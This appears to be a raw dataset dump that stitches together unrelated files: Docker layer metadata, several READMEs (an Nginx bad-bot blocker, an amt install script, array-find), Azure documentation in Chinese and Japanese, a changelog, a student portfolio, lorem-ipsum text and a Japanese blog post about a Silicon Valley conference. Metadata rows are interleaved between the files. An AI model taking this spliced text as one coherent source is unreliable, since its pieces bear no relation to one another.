MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8523a670e655d17a155615b3951701de0f60989ba5f6c9a1b1e4cb2a865a753a`
Last Modified: Tue, 26 May 2020 23:14:57 GMT
Size: 10.0 KB (10000 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:72c22edec5ca48a740ebda63d24dd23563aabe0e241a1fbe20bfcbc741229098`
Last Modified: Tue, 26 May 2020 23:14:57 GMT
Size: 813.9 KB (813875 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f03b5fd0964a0e116ef2d303279b5c230acf1d728933e7ba68d18b4a75b0077f`
Last Modified: Tue, 26 May 2020 23:15:03 GMT
Size: 7.0 MB (7011508 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:aa064cdad6451867792ab3bdfa39d254d80637297c5b0aab5114b0b9cb1e1d43`
Last Modified: Tue, 26 May 2020 23:15:12 GMT
Size: 55.6 MB (55590027 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9f00de6606f32b294765f23eadc63cd1b6f198ce4bc18a86cd9cb38e7d0b0729`
Last Modified: Tue, 26 May 2020 23:15:12 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
| 85.4654 | 2,676 | 0.711628 | yue_Hant | 0.405252 |
61ba95a865d6581e512ab61c07c5fb9bc1970ad0 | 2,153 | md | Markdown | dump/public-vault-snapshot/etc/nginx/nginx-badbot-blocker/README.md | gandalfleal/twvault | 4950aa2317c938e06a8c8913f365666dd4400e0d | [
"MIT-0"
] | 1 | 2021-12-09T19:01:17.000Z | 2021-12-09T19:01:17.000Z | dump/public-vault-snapshot/etc/nginx/nginx-badbot-blocker/README.md | tylercamp/twvault | 4950aa2317c938e06a8c8913f365666dd4400e0d | [
"MIT-0"
] | null | null | null | dump/public-vault-snapshot/etc/nginx/nginx-badbot-blocker/README.md | tylercamp/twvault | 4950aa2317c938e06a8c8913f365666dd4400e0d | [
"MIT-0"
] | 3 | 2021-11-27T14:30:35.000Z | 2022-03-20T03:51:55.000Z | Nginx Bad Bot Blocker
===============
**223 (and growing) Nginx rules to block bad bots.**
Bad bots are defined as:
- E-mail harvesters
- Content scrapers
- Spam bots
- Vulnerability scanners
- Aggressive bots that provide little value
- Bots linked to viruses or malware
- Government surveillance bots
- ~~~Russian search engine Yandex~~~ (Per users request Yandex was removed)
- Chinese search engine Baidu
- Spamhaus IP list block
## Installation
If you have a bizarre or complicated setup, be sure to look everything
over before installing. However, for anyone with a fairly straightforward Nginx installation, this should work without any issues.
**Step 1.)** Clone the Nginx Bad Bot Blocker repository into your Nginx directory.
```
cd /etc/nginx
git clone https://github.com/mariusv/nginx-badbot-blocker.git
```
**Step 2.)** Edit `/etc/nginx/nginx.conf` and add the following at the end of the `http` block, before the closing `}`
```
##
# Nginx Bad Bot Blocker
##
include nginx-badbot-blocker/blacklist.conf;
include nginx-badbot-blocker/blockips.conf;
```
**Step 3.)** Run the following command to verify your Nginx configuration is valid. (*Note: You may need to prepend sudo to this command.*)
```
nginx -t
```
You should get an output that looks something like this:
```
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
```
**Step 4.)** Reload Nginx and you're all set!
```
sudo service nginx reload
```
---
## Further information
### Baidu
Unless your website is written in Chinese, you probably don't
get any traffic from them. They mostly just waste bandwidth and consume resources.
### Bots Are Liars
Bots try to make themselves look like other software by disguising their
useragent. Their useragents may look harmless, perfectly legitimate even.
For example, "^Java" but according to
[Project Honeypot](https://www.projecthoneypot.org/harvester_useragents.php),
it's actually one of the most dangerous.
### Spamhaus IP Block
Block Spamhaus Lasso Drop Spam IP Address. (I'll keep this list updated)
***UPDATED 16/01/2018***
| 25.034884 | 139 | 0.743149 | eng_Latn | 0.984429 |
61bb40d5f3a9121b3269237324800a5bc2840d7e | 1,024 | md | Markdown | articles/active-directory/user-help/user-help-password-reset-overview.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/user-help/user-help-password-reset-overview.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/user-help/user-help-password-reset-overview.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 密码重置概述 - Azure Active Directory | Microsoft Docs
description: 了解如何在没有管理员协助的情况下注册并重置密码。
services: active-directory
author: eross-msft
manager: daveba
ms.reviewer: sahenry
ms.service: active-directory
ms.workload: identity
ms.subservice: user-help
ms.topic: overview
ms.date: 07/30/2018
ms.author: lizross
ms.collection: M365-identity-device-management
ms.openlocfilehash: 5d03cdc8093651605839f813c264880b778167a6
ms.sourcegitcommit: 301128ea7d883d432720c64238b0d28ebe9aed59
ms.translationtype: HT
ms.contentlocale: zh-CN
ms.lasthandoff: 02/13/2019
ms.locfileid: "56165030"
---
# <a name="reset-password-overview"></a>密码重置概述
如果忘记了密码、从来没有从公司支持人员处得到过密码,或者帐户被锁定,则可使用安全信息和移动设备来重置密码。
>[!Important]
>此内容适用于用户。 如果你是管理员,可以在 [Azure Active Directory 文档](https://docs.microsoft.com/azure/active-directory)中查找有关如何设置和管理 Azure Active Directory (Azure AD) 环境的详细信息。
|文章 |说明 |
|------|------------|
|[注册自助密码重置](active-directory-passwords-reset-register.md)| 介绍如何注册,以便重置自己的密码。|
|[重置密码](user-help-reset-password.md)| 介绍如何重置自己的密码。|
| 31.030303 | 156 | 0.787109 | yue_Hant | 0.583657 |
61bb76f30dcc058ebfd6fe0e7d53063d7934a2bb | 160 | md | Markdown | docs/_snippets/flutter_firestore_todos_tutorial/user_repository_pubspec.yaml.md | gaabgonca/bloc | f3de2cf13a1802caf4cf6e8911cbd684082ef21e | [
"MIT"
] | 9,358 | 2018-10-08T03:59:10.000Z | 2022-03-31T21:20:30.000Z | docs/_snippets/flutter_firestore_todos_tutorial/user_repository_pubspec.yaml.md | gaabgonca/bloc | f3de2cf13a1802caf4cf6e8911cbd684082ef21e | [
"MIT"
] | 2,854 | 2018-10-09T09:30:19.000Z | 2022-03-31T21:07:11.000Z | docs/_snippets/flutter_firestore_todos_tutorial/user_repository_pubspec.yaml.md | gaabgonca/bloc | f3de2cf13a1802caf4cf6e8911cbd684082ef21e | [
"MIT"
] | 3,377 | 2018-10-14T21:37:37.000Z | 2022-03-31T10:08:35.000Z | ```yaml
name: user_repository
version: 1.0.0+1
environment:
sdk: ">=2.6.0 <3.0.0"
dependencies:
flutter:
sdk: flutter
firebase_auth: ^0.15.0+1
```
| 11.428571 | 26 | 0.63125 | eng_Latn | 0.35552 |
61bbe786091603779cb0c60f0b09d23818913f11 | 566 | md | Markdown | README.md | sergej-samsonow/amt | a94d99b864c9cbf11569175064391a8c20fd81c2 | [
"Apache-2.0"
] | null | null | null | README.md | sergej-samsonow/amt | a94d99b864c9cbf11569175064391a8c20fd81c2 | [
"Apache-2.0"
] | null | null | null | README.md | sergej-samsonow/amt | a94d99b864c9cbf11569175064391a8c20fd81c2 | [
"Apache-2.0"
] | null | null | null | # amt - application management tool
Collection of helper functions for development and distribution of own
infrastructure script solutions.
## Install
Switch into you favorite installation directory than:
`mkdir amt && cd amt && wget https://raw.githubusercontent.com/sergej-samsonow/amt/master/amt && chmod u+x amt`
This command install amt executable into you `installation directory/amt/amt`
Add you `amt` directory that contains `amt` exectuable to you path.
## Development
`amt-package` creates amt.tar.gz archive that contains amt script and core directory
| 43.538462 | 111 | 0.793286 | eng_Latn | 0.949358 |
61bc5bbfaf2b81d954b1b9182a38314bd7e46d3e | 19 | md | Markdown | README.md | Zchristian955/Data_Warehouse | 836c8d54a330aa4c5999eda406fbe167b10f64f0 | [
"MIT"
] | null | null | null | README.md | Zchristian955/Data_Warehouse | 836c8d54a330aa4c5999eda406fbe167b10f64f0 | [
"MIT"
] | null | null | null | README.md | Zchristian955/Data_Warehouse | 836c8d54a330aa4c5999eda406fbe167b10f64f0 | [
"MIT"
] | null | null | null | # Data_Warehouse
| 4.75 | 16 | 0.736842 | deu_Latn | 0.412333 |
61bcbca9fcf3ae55b245e2bb50084c2c6c6fffa9 | 459 | md | Markdown | content/book_1/002_suscipit_velit_interdum_dui/003_lobortis_adipiscing/004_augue_ligula_erat.md | wernerstrydom/sample-book | dbe00c6a6e2c9c227a6eb8955371d394b9398e48 | [
"MIT"
] | null | null | null | content/book_1/002_suscipit_velit_interdum_dui/003_lobortis_adipiscing/004_augue_ligula_erat.md | wernerstrydom/sample-book | dbe00c6a6e2c9c227a6eb8955371d394b9398e48 | [
"MIT"
] | null | null | null | content/book_1/002_suscipit_velit_interdum_dui/003_lobortis_adipiscing/004_augue_ligula_erat.md | wernerstrydom/sample-book | dbe00c6a6e2c9c227a6eb8955371d394b9398e48 | [
"MIT"
] | null | null | null | ### Augue ligula erat
Feugiat congue, ipsum vestibulum porta blandit commodo, leo, nunc, hac class nullam
Ultrices blandit, amet, sem, dictumst urna eu, fames augue pulvinar, convallis orci ligula
Fusce inceptos mollis mi, urna, maecenas eleifend, tempor, lacinia. Aenean orci, proin euismod diam luctus
Sit pharetra ut euismod vehicula dictum imperdiet
Dui eget laoreet. Fringilla, blandit, nullam conubia dui vitae auctor. Leo, finibus tincidunt non
| 32.785714 | 106 | 0.793028 | cat_Latn | 0.237357 |
61bcbeec5f0742eb0e87703187729f414b30b0b2 | 2,749 | md | Markdown | CHANGELOG.md | shamork/Metrics.NET | dee08fd67b910ca717ae12048d0d99fd37f0ceed | [
"Apache-2.0"
] | 664 | 2015-01-02T12:49:54.000Z | 2022-02-27T11:08:24.000Z | CHANGELOG.md | shamork/Metrics.NET | dee08fd67b910ca717ae12048d0d99fd37f0ceed | [
"Apache-2.0"
] | 80 | 2015-01-12T21:02:12.000Z | 2019-12-07T21:25:44.000Z | CHANGELOG.md | shamork/Metrics.NET | dee08fd67b910ca717ae12048d0d99fd37f0ceed | [
"Apache-2.0"
] | 191 | 2015-01-13T20:51:12.000Z | 2021-09-02T20:33:20.000Z | ###0.2.16 / 2015-03-19
* retry starting httplistener on failure (better support for asp.net hosting where app pools are recycled)
###0.2.15 / 2015-03-03
* fix disposal of httplistener (@nkot)
* Added Process CPU usage into app counters (@o-mdr)
* resharper cleanup
* update dependencies
###0.2.14 / 2014-12-15
* fix possible issue when metrics are disabled and timer returns null TimerContext
###0.2.13 / 2014-12-14
* fix error when trying to globally disable metrics
* first elasticsearch bits
###0.2.11 / 2014-11-16
* graphite adapter (early bits, might have issues)
* refactor & cleanup reporting infra
###0.2.10 / 2014-11-06
* fix error logging for not found performance counters
###0.2.9 / 2014-11-05
* record active sessions for timers
###0.2.8 / 2014-10-29
* handle access issues for perf counters
###0.2.7 / 2014-10-28
* preparations for out-of-process metrics
###0.2.6 / 2014-10-17
* fix http listener prefix handling
###0.2.5 / 2014-10-12
* JSON metrics refactor
* remote metrics
###0.2.4 / 2014-10-07
* JSON version
* added environment
* various fixes
###0.2.3 / 2014-10-01
* add support for set counter & set meters [details](https://github.com/etishor/Metrics.NET/issues/21)
* cleanup owin adapter
* better & more resilient error handling
###0.2.2 / 2014-09-27
* add support for tagging metrics (not yet used in reports or visualization)
* add support for suppling a string user value to histograms & timers for tracking min / max / last values
* tests cleanup, some refactoring
###0.2.1 / 2014-09-25
* port latest changes from original metrics lib
* port optimization from ExponentiallyDecayingReservoir (https://github.com/etishor/Metrics.NET/commit/1caa9d01c16ff63504612d64771d52e9d7d9de5e)
* other minor optimizations
* add gauges for thread pool stats
###0.2.0 / 2014-09-20
* implement metrics contexts (and child contexts)
* make config more friendly
* most used condig options are now set by default
* add logging based on liblog (no fixed dependency - automaticaly wire into existing logging framework)
* update nancy & owin adapters to use contexts
* add some app.config settings to ease configuration
###0.1.11 / 2014-08-18
* update to latest visualization app (fixes checkboxes being outside dropdown)
* fix json caching in IE
* allow defining custom names for metric registry
###0.1.10 / 2014-07-30
* fix json formating (thanks to Evgeniy Kucheruk @kpoxa)
###0.1.9 / 2014-07-04
* make reporting more extensible
###0.1.8
* remove support for .NET 4.0
###0.1.6
* for histograms also store last value
* refactor configuration ( use Metric.Config.With...() )
* add option to completely disable metrics Metric.Config.CompletelyDisableMetrics() (useful for measuring metrics impact)
* simplify health checks
| 31.238636 | 144 | 0.742452 | eng_Latn | 0.936983 |
61bd313731d204724176021a0700beb07f8ce540 | 5,754 | md | Markdown | docs/team/marcuspeh.md | kheekheekhee/tp | 8ebba3701d1cdf8f974653583ac36c157415fc67 | [
"MIT"
] | null | null | null | docs/team/marcuspeh.md | kheekheekhee/tp | 8ebba3701d1cdf8f974653583ac36c157415fc67 | [
"MIT"
] | null | null | null | docs/team/marcuspeh.md | kheekheekhee/tp | 8ebba3701d1cdf8f974653583ac36c157415fc67 | [
"MIT"
] | null | null | null | ---
layout: page
title: Marcus Peh's Project Portfolio Page
---
### Project: Around the World in $80
Around the World in $80 is a desktop application that splits bills between different contacts. The user interacts with it using a CLI, and it has a GUI created with JavaFX. It is written in Java, and has about 10 kLoC.
Given below are my contributions to the project. [RepoSense link](https://nus-cs2103-ay2122s1.github.io/tp-dashboard/?search=marcuspeh&sort=groupTitle&sortWithin=title&timeframe=commit&mergegroup=&groupSelect=groupByRepos&breakdown=true&checkedFileTypes=docs~functional-code~test-code~other&since=2021-09-17)
### Features
* **New Feature**: Added the ability to change between contacts and groups view.
* What it does: Allows the user to see groups / contacts with a command.
* Justification: This feature is crucial as the user should be able to view the groups and contacts created.
* Highlights: This implementation added in a new command `groups` to see all groups. It changes the command `list` to `contacts`. `contacts` allows the user to see all contacts.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/121)
* **New Feature**: Added the ability to find groups.
* What it does: Allows the user to find for groups with a command.
* Justification: This feature will allow the user to check if a group has been created and the details of the group.
* Highlight: This implementation added in a new command `findgroups` to find for group. It will also change the view from `contacts` to `groups`.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/163)
* **New Feature**: Added the ability to see the total spending per person in a trip
* What it does: Allows the user to find their expenses in a trip.
* Justification: This feature will allow the user to track their expenses and cut down spending if needed.
* Highlight: This implementation added in a new command `transactionsummary` to see expenses.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/206)
* **Update**: Updated the data stored in `Expense` and `Group`.
* What it does: Allows for the splitting in expense between users of a group. Update `Expense` command to be more straight forward.
* Justification: The data stored is crucial in keeping track of the expense. A clear and straight forward storing of expense is necessary to prevent bugs.
* Highlight: This update makes adding of expense more straightforward and split the expenses of users properly.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/245)
* **Enhancements to existing features**:
* Updated the UI interface layout. [\#121](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/121)
* Added in buttons to toggle between contacts page and group page [\#121](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/121)
### Bug Fixes
* **severity.HIGH** Edit person does not update groups and expenses. [\#158](https://github.com/AY2122S1-CS2103T-F13-1/tp/issues/153)
* What happen: The command `addPerson` does not replace the instance of the old person from groups and expenses.
* Pull request: [\#158](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/158)
* **severity.HIGH** Commands for modifying groups will result in the entire group's expense to be wiped. [\#270](https://github.com/AY2122S1-CS2103T-F13-1/tp/issues/270)
* What happen: Expenses were not brought from the old instance to the new instance of that specific group.
* Pull request: [\#269](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/269), [\#273](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/273)
* **severity.MED** Json files loads even when phone number of contacts is partially changed ie not all phone number of a contact is changed.
* What happen: Checks when file is loading is only done based on the name of the contact and not the entire contact info.
* Pull request: [\#425](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/425)
### Others
* **Project management**
* Managed releases: [v1.2](https://github.com/AY2122S1-CS2103T-F13-1/tp/releases/tag/v1.2)
* **User Guide**:
* Added user guide for the features `groups`, `expenses`, `findgroups` and `transactionsummary`.
* Added FAQs.
* **Developer Guide**:
* Updated UI segment in Design with class diagram and explanation.
* Added implementation and design consideration for user interface.
* Added implementation, test cases and use cases for `findgroups`, `transactionsummary`.
* Added use cases for `view groups`, `find person` and `view expenses`.
* **Testing**:
* Examples of PR that increase code coverageL [\#352](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/352), [\#353](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/353), [/#356](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/356)
* **Community**:
* Maintaining the issue tracker
* PRs reviewed (with non-trivial review comments): [\#113](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/113), [\#116](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/116)
* Contributed to forum discussions (examples: [1](https://github.com/nus-cs2103-AY2122S1/forum/issues/328), [2](https://github.com/nus-cs2103-AY2122S1/forum/issues/9), [3](https://github.com/nus-cs2103-AY2122S1/forum/issues/11))
* Reported bugs and suggestions for other teams in the class (examples: [1 (F13-3)](https://github.com/AY2122S1-CS2103T-F13-3/tp/issues/332), [2 (F13-3)](https://github.com/AY2122S1-CS2103T-F13-3/tp/issues/328), [3 (W16-2)](https://github.com/AY2122S1-CS2103T-W16-2/tp/issues/216), [4 (W16-2)](https://github.com/AY2122S1-CS2103T-W16-2/tp/issues/224))
| 75.710526 | 353 | 0.738269 | eng_Latn | 0.945263 |
61bd4128c5904ef182d8f4298adf5b42a5441b48 | 4,099 | md | Markdown | articles/active-directory/governance/manage-user-access-with-access-reviews.md | Artaggedon/azure-docs.es-es | 73e6ff211a5d55a2b8293a4dc137c48a63ed1369 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/governance/manage-user-access-with-access-reviews.md | Artaggedon/azure-docs.es-es | 73e6ff211a5d55a2b8293a4dc137c48a63ed1369 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/governance/manage-user-access-with-access-reviews.md | Artaggedon/azure-docs.es-es | 73e6ff211a5d55a2b8293a4dc137c48a63ed1369 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Administración del acceso de los usuarios con las revisiones de acceso - Azure AD
description: Aprenda a administrar el acceso de los usuarios, como la pertenencia a un grupo o la asignación a una aplicación con revisiones de acceso de Azure Active Directory
services: active-directory
documentationcenter: ''
author: ajburnle
manager: daveba
editor: markwahl-msft
ms.service: active-directory
ms.workload: identity
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: conceptual
ms.subservice: compliance
ms.date: 06/21/2018
ms.author: ajburnle
ms.reviewer: mwahl
ms.collection: M365-identity-device-management
ms.openlocfilehash: cc12b4cb7e97a0808405baebc64ca83cdb742bf1
ms.sourcegitcommit: f28ebb95ae9aaaff3f87d8388a09b41e0b3445b5
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 03/29/2021
ms.locfileid: "94696955"
---
# <a name="manage-user-access-with-azure-ad-access-reviews"></a>Administración del acceso de los usuarios con las revisiones de acceso de Azure AD
Con Azure Active Directory (Azure AD), puede asegurarse de que los usuarios tienen el acceso adecuado. Puede pedir a los propios usuarios o a quien decida en su lugar que participen en una revisión de acceso y vuelvan a certificar (o atestiguar) el acceso de los usuarios. Los revisores pueden dar su aprobación para cada necesidad de acceso continuado de los usuarios, en función de las sugerencias de Azure AD. Cuando una revisión de acceso haya terminado, es posible hacer cambios y retirar la concesión de acceso a los usuarios que ya no lo necesitan.
> [!NOTE]
> Si desea revisar solo el acceso de los usuarios invitados y no el de todos los tipos de usuarios, consulte [Administración del acceso de los invitados con las revisiones de acceso de Azure AD](manage-guest-access-with-access-reviews.md). Si desea revisar la pertenencia de los usuarios a roles administrativos tales como administrador global, consulte [Inicio de una revisión de acceso en Azure AD Privileged Identity Management](../privileged-identity-management/pim-how-to-start-security-review.md).
## <a name="prerequisites"></a>Prerrequisitos
- Azure AD Premium P2
Para obtener más información, consulte [Requisitos de licencia](access-reviews-overview.md#license-requirements).
## <a name="create-and-perform-an-access-review"></a>Creación y realización de una revisión de acceso
Puede tener uno o más usuarios como revisores en una revisión de acceso.
1. Seleccione un grupo de Azure AD con uno o más miembros. O bien, seleccione una aplicación conectada a Azure AD con uno o más usuarios asignados a ella.
2. Decida si cada usuario revisará su propio acceso o bien si uno o más usuarios revisarán el acceso de todos.
3. En uno de los siguientes roles: un administrador global, un administrador de usuarios o un propietario del grupo de seguridad de M365 o AAD (versión preliminar) del grupo que se va a revisar, vaya a la [página de Identity Governance](https://portal.azure.com/#blade/Microsoft_AAD_ERM/DashboardBlade/).
4. Cree la revisión de acceso. Para más información, consulte [Creación de una revisión de acceso de los grupos o las aplicaciones](create-access-review.md).
5. Cuando se inicie la revisión de acceso, pida a los revisores que proporcionen una entrada. De forma predeterminada, cada uno recibe un correo electrónico de Azure AD con un vínculo al panel de acceso con el que podrán [realizar la revisión de acceso de los grupos o las aplicaciones](perform-access-review.md).
6. Si los revisores no han proporcionado información, puede pedir a Azure AD que les envíe un recordatorio. De forma predeterminada, Azure AD envía automáticamente un recordatorio hacia la mitad del plazo de finalización a los revisores que no hayan respondido.
7. Cuando los revisores hayan proporcionado la información, detenga la revisión de acceso y aplique los cambios. Para más información, consulte [Revisión de acceso de los grupos o las aplicaciones](complete-access-review.md).
## <a name="next-steps"></a>Pasos siguientes
[Creación de una revisión de acceso de grupos o aplicaciones](create-access-review.md)
| 63.061538 | 555 | 0.799463 | spa_Latn | 0.984008 |
61bdccd6caa08cfd7874939cf03913b304282f8f | 989 | md | Markdown | node_modules/array-find/README.md | priyanka-ucreate/reactappnew | affc05d4c8b1cfac84d410213f24df81ce9d9493 | [
"MIT"
] | 435 | 2019-10-17T06:16:02.000Z | 2022-01-11T19:07:02.000Z | node_modules/array-find/README.md | priyanka-ucreate/reactappnew | affc05d4c8b1cfac84d410213f24df81ce9d9493 | [
"MIT"
] | 42 | 2019-01-22T06:57:17.000Z | 2020-04-08T05:36:19.000Z | node_modules/array-find/README.md | yovanamg/challenge | f5ed810aacfa999912e4e8d8d86e588aa90c156c | [
"MIT"
] | 45 | 2019-10-21T23:40:16.000Z | 2021-11-10T01:05:19.000Z | # array-find
[](https://travis-ci.org/stefanduberg/array-find)
**ES 2015 `Array.find` ponyfill.**
**Ponyfill: A polyfill that doesn't overwrite the native method.**
Find array elements. Executes a callback for each element, returns the first element for which its callback returns a truthy value.
## Usage
```javascript
var find = require('array-find');
var numbers = [1, 2, 3, 4];
find(numbers, function (element, index, array) {
return element === 2;
});
// => 2
var robots = [{name: 'Flexo'}, {name: 'Bender'}, {name: 'Buster'}];
find(robots, function (robot, index, array) {
return robot.name === 'Bender';
});
// => {name: 'Bender'}
find(robots, function (robot, index, array) {
return robot.name === 'Fry';
});
// => undefined
```
Optionally pass in an object as third argument to use as `this` when executing callback.
## Install
```bash
$ npm install array-find
```
## License
MIT
| 21.977778 | 131 | 0.674419 | eng_Latn | 0.606531 |
61be587b92bd59f2b75bb6273a7ada482f095e83 | 2,423 | md | Markdown | articles/sql-database/sql-database-design-first-database-csharp.md | 07JP27/azure-docs.ja-jp | a65f56023d2afb8b43d8c96af75ca662d584a41b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/sql-database/sql-database-design-first-database-csharp.md | 07JP27/azure-docs.ja-jp | a65f56023d2afb8b43d8c96af75ca662d584a41b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/sql-database/sql-database-design-first-database-csharp.md | 07JP27/azure-docs.ja-jp | a65f56023d2afb8b43d8c96af75ca662d584a41b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 最初の Azure SQL Database の設計 - C# | Microsoft Docs
description: ADO.NET を利用し、C# プログラムで最初の Azure SQL データベースを設計し、それに接続する方法について説明します。
services: sql-database
ms.service: sql-database
ms.subservice: development
ms.custom: ''
ms.devlang: ''
ms.topic: tutorial
author: MightyPen
ms.author: genemi
ms.reviewer: carlrab
manager: craigg-msft
ms.date: 06/07/2018
ms.openlocfilehash: 65a9bde6fa086dc56809df9619ceee1c5b417e31
ms.sourcegitcommit: cc4fdd6f0f12b44c244abc7f6bc4b181a2d05302
ms.translationtype: HT
ms.contentlocale: ja-JP
ms.lasthandoff: 09/25/2018
ms.locfileid: "47063303"
---
# <a name="design-an-azure-sql-database-and-connect-with-cx23-and-adonet"></a>C# と ADO.NET で Azure SQL データベースを設計し、接続する
Azure SQL Database は、Microsoft Cloud (Azure) のリレーショナルなサービスとしてのデータベース (DBaaS) です。 このチュートリアルでは、Azure Portal、ADO.NET、および Visual Studio を使用して以下の手順を実行する方法を説明します。
> [!div class="checklist"]
> * Azure Portal でデータベースを作成する
> * Azure Portal でサーバーレベルのファイアウォール規則を設定する
> * ADO.NET と Visual Studio を使用してデータベースに接続する
> * ADO.NET を使用してテーブルを作成する
> * ADO.NET を使用してデータを挿入、更新、削除する
> * ADO.NET を使用してデータのクエリを実行する
Azure サブスクリプションをお持ちでない場合は、開始する前に[無料アカウントを作成](https://azure.microsoft.com/free/)してください。
## <a name="prerequisites"></a>前提条件
[Visual Studio Community 2017、Visual Studio Professional 2017、Visual Studio Enterprise 2017 のいずれか](https://www.visualstudio.com/downloads/)のインストール。
<!-- The following included .md, sql-database-tutorial-portal-create-firewall-connection-1.md, is long.
And it starts with a ## H2.
-->
[!INCLUDE [sql-database-tutorial-portal-create-firewall-connection-1](../../includes/sql-database-tutorial-portal-create-firewall-connection-1.md)]
<!-- The following included .md, sql-database-csharp-adonet-create-query-2.md, is long.
And it starts with a ## H2.
-->
[!INCLUDE [sql-database-csharp-adonet-create-query-2](../../includes/sql-database-csharp-adonet-create-query-2.md)]
## <a name="next-steps"></a>次の手順
このチュートリアルでは、データベースとテーブルの作成、データの読み込みとクエリ実行、以前の特定の時点へのデータベースの復元などの基本的なデータベース タスクについて学習しました。 以下の方法について学習しました。
> [!div class="checklist"]
> * データベースを作成する
> * ファイアウォール規則の設定
> * [Visual Studio と C#](sql-database-connect-query-dotnet-visual-studio.md) を使用して SQL Database に接続する
> * テーブルの作成
> * データを挿入、更新、削除する
> * データのクエリを実行する
次のチュートリアルに進み、データの移行について確認してください。
> [!div class="nextstepaction"]
> [SQL Server データベースを Azure SQL Database に移行する](sql-database-migrate-your-sql-server-database.md)
| 34.614286 | 157 | 0.772183 | yue_Hant | 0.320224 |
61bf1b2c4cfc106fe72804919db6fbb66293640a | 1,912 | md | Markdown | _posts/2008-12-15-jtpa-2009-2.md | hirofukami/hirofukami.github.io | 4c759e7fa2b5f98519b85f7f9048ab0f437fd4b1 | [
"MIT"
] | null | null | null | _posts/2008-12-15-jtpa-2009-2.md | hirofukami/hirofukami.github.io | 4c759e7fa2b5f98519b85f7f9048ab0f437fd4b1 | [
"MIT"
] | null | null | null | _posts/2008-12-15-jtpa-2009-2.md | hirofukami/hirofukami.github.io | 4c759e7fa2b5f98519b85f7f9048ab0f437fd4b1 | [
"MIT"
] | null | null | null | ---
title: JTPA シリコンバレー・カンファレンス 2009 に参加します
date: Mon, 15 Dec 2008 15:00:00 +0000
author: Hiro Fukami
layout: post
permalink: /2008/12/15/jtpa-2009-2/
tumblr_hirofukami_permalink:
- http://hirofukami.tumblr.com/post/29609206563/jtpa-2009
- http://hirofukami.tumblr.com/post/29609206563/jtpa-2009
- http://hirofukami.tumblr.com/post/29609206563/jtpa-2009
tumblr_hirofukami_id:
- 29609206563
- 29609206563
- 29609206563
original_post_id:
- 298
- 298
- 298
categories:
- Business
tags:
- JTPA
---
<div class="section">
<p>
<a href="http://www.jtpa.org/event/svtour/" target="_blank"><img alt="Silicon Valley Conference" src="http://www.jtpa.org/images/svconf2009.png?resize=175%2C144" border="0" data-recalc-dims="1" /></a>
</p>
<p>
今さらながら書いてますが、来年3/21にシリコンバレーで行われる、JTPA シリコンバレー・カンファレンス 2009 に申し込みました。
</p>
<p>
前回まではツアーで参加者も少数だったのが、今回は現地集合で1日かけたカンファレンスを実施。あとは好きにアポイントとるなりして見学行ってね。という参加者の主体性を期待した形態になっていた。
</p>
<p>
すでに Facebook 上では<a href="http://www.facebook.com/home.php?#/group.php?gid=25208215005" target="_blank">グループ</a>ができており、主催者と参加者間で見学の参加者を募ったり、日時調整が行われています。私も<a href="http://d.hatena.ne.jp/umedamochio/20081104/p1" target="_blank">梅田望夫さんとのミーティング</a>に参加したいと思っていたけど、一緒に行く人が見つけられなかったのでFacebookグループを通じて<a href="http://jtpa09.g.hatena.ne.jp/" target="_blank">取りまとめていただいて</a>感謝感謝です。
</p>
<p>
シリコンバレーはやはりネットサービスを作るための洗練された環境があると思っていて、実際にどんな人たちがどんなことを考えてどんなペースで作っていっているのか。がなるべく早いうちに知りたかった。
</p>
<p>
その機会の一つとして去年からJTPAはチェックしていたけど、来年3月であれば自由に時間を使える環境になっているし、絶好のチャンスだと思って迷わず申し込んだ。
</p>
<p>
梅田さんとの話、参加者の方々との人脈作り、実際の見てきて感じた体験など全てがこれからの自分にとって必ずいい刺激を受けて、今後プラスに働くと思っている。
</p>
<p>
当日まで時間は少しあるのでそれまでに飛行機のチケット取りとか国際免許取りに行くとか準備はあるが、何よりも自分自身のやっているコアな部分を説明できるようになっておきたいと思う。
</p>
<p>
それともし自分のように一人で参加を申し込まれて日本からシリコンバレーに行こうと思っている方いれば一緒に行きましょう。適当な手段でコンタクトください。Facebookグループでも Hironobu Fukami でメンバーにいます。
</p>
